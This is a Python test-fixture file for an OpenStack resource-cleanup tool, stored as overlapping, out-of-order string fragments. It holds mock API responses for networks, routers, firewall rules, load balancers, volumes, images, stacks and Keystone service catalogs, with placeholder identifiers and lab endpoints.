"None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID",
"\"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = { \"volumes\":",
"LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True,",
"\"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4,",
"\"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" }, { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\":",
"the specific language governing permissions and limitations # under the License. TOKEN_ID =",
"\"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\": { \"My",
"\"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\",",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service', 'type': 'image' }, { 'endpoints': [{ 'adminURL':",
"'ec2' }, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}],",
"\"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\":",
"\"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ]",
"'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': { u'id': u'v2.0', u'links': [",
"\"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID },",
"LBAAS_POOL_IDS[1], \"session_persistence\": None } ] } LBAAS_POOL_LIST = { \"pools\": [ { \"status\":",
"\"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\":",
"\"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\",",
"\"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False,",
"\"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\",",
"PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\" }",
"None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\", \"links\": [ {",
"\"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST = { \"members\":",
"\"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None",
"} ] } FIREWALL_LIST = { \"firewalls\": [ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\",",
"'Volume Service', 'type': 'volume' }, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL':",
"\"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\":",
"} ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'},",
"u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ { \"count\":",
"STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\"",
"\"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\":",
"} ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\":",
"\"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0]",
"{ \"My Server Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\":",
"'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = {",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service', 'type': 'volume' }, { 'endpoints': [{",
"\"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\":",
"}, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\":",
"\"http_method\": \"GET\", \"timeout\": 2, \"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] }",
"} NETWORKS_LIST = { \"networks\": [ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\",",
"None, \"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ { \"admin_state_up\":",
"[\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS",
"True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\":",
"\"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1,",
"{ \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\",",
"\"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\":",
"{ \"stacks\": [ { \"description\": \"First test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\":",
"True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\":",
"\"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\":",
"'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service', 'type': 'identity' }, { 'endpoints':",
"\"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } }",
"{\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY",
"[ { \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": { \"private\": [ { \"addr\": \"192.168.0.3\",",
"\"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\":",
"# License for the specific language governing permissions and limitations # under the",
"[\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\",",
"u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01',",
"\"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\":",
"\"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\":",
"'EC2 Service', 'type': 'ec2' }, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL':",
"} ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\": [ { \"href\":",
"http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,",
"in writing, software # distributed under the License is distributed on an \"AS",
"NETWORKS_IDS[1], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True,",
"False }, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"\"My Server Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\",",
"\"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True }",
"True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\",",
"\"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\":",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\",",
"\"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\":",
"'type': 'metering' }, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region':",
"}, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\":",
"\"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"]",
"\"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID },",
"{ \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0],",
"\"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\":",
"the Apache License, Version 2.0 (the \"License\"); you may # not use this",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service', 'type': 'identity' }, { 'endpoints': [{ 'adminURL':",
"\"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" },",
"\"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\":",
"\"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] }",
"None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\",",
"\"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS",
"IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service', 'type': 'image' },",
"[ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\":",
"] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\",",
"= { \"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\",",
"'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"]",
"\"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] } IMAGES_LIST = { \"images\": [ {",
"\"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\":",
"\"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ {",
"False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\":",
"'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service', 'type':",
"\"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\",",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"},",
"[], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST = {",
"WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the #",
"\"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" }",
"} ]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\"",
"'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8'",
"\"ports\": [ { \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID,",
"[], 'name': 'EC2 Service', 'type': 'ec2' }, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL':",
"u'%s' % AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf',",
"\"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\" } ]",
"\"\" } ] } METERING_LABEL_LIST = { \"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\":",
"\"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = { \"volumes\": [ {",
"'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS",
"u'description': u'A Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT,",
"\"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\":",
"4 } ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\": [ {",
"False }, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\",",
"\"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False }, { \"status\":",
"'<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58'",
"\"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\":",
"sent from the Server PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog': [{ 'endpoints': [{",
"VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS =",
"\"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST = { u'backups': [",
"'type': 'ec2' }, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region':",
"(the \"License\"); you may # not use this file except in compliance with",
"\"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\",",
"u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ { \"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0]",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service', 'type': 'compute' }, { 'endpoints': [{ 'adminURL':",
"\"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None,",
"}, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\":",
"\"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }",
"{ \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\",",
"\"bookmark\" } ] }, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, {",
"# # Unless required by applicable law or agreed to in writing, software",
"\"addr\": \"192.168.0.3\", \"version\": 4 } ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\",",
"ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID,",
"\"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1],",
"] } FIREWALL_LIST = { \"firewalls\": [ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\":",
"ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT",
"None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\",",
"\"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\":",
"python # -*- encoding: utf-8 -*- # # Copyright © 2014 Cloudwatt #",
"\"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" },",
"}, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links':",
"} NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True,",
"= [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\",",
"'Image Service', 'type': 'image' }, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL':",
"\"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\":",
